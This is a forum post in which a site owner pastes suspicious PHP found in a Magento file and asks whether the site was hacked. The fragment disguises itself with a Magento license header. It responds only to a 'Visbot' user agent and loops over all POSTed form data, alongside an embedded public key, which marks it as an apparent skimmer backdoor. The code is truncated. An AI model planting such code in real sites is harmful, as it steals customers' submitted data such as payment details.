Some days back I found this code in one of my application file. I am using git in my server so I can found modified file easily. I checked it but I am not getting what this piece of code does exactly.
Can anybody explain me? Is it hacked or something? Thanks
<?PHP /***
Magento** NOTICE OF LICENSE** This source file is subject to the Open Software License (OSL 3.0)* that is bundled with this package in the file LICENSE.txt.* It is also available through the world-wide-web at this URL:***/
$k3="-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if(@$_SERVER['HTTP_USER_AGENT']=='Visbot/2.0 (+;
[email protected])'){if(isset($_GET[$k2])){$m1=file_exists($y0)?@filemtime($y0):$m1;
echo 'clean ok';
}else echo 'Pong';
foreach($_POST as $h6=>$n7){if(is_array($n7)){foreach($n7 as $f8=>$l9){if(is_array($l9)){foreach($l9 as $l10=>$v11){if(is_array($v11)){;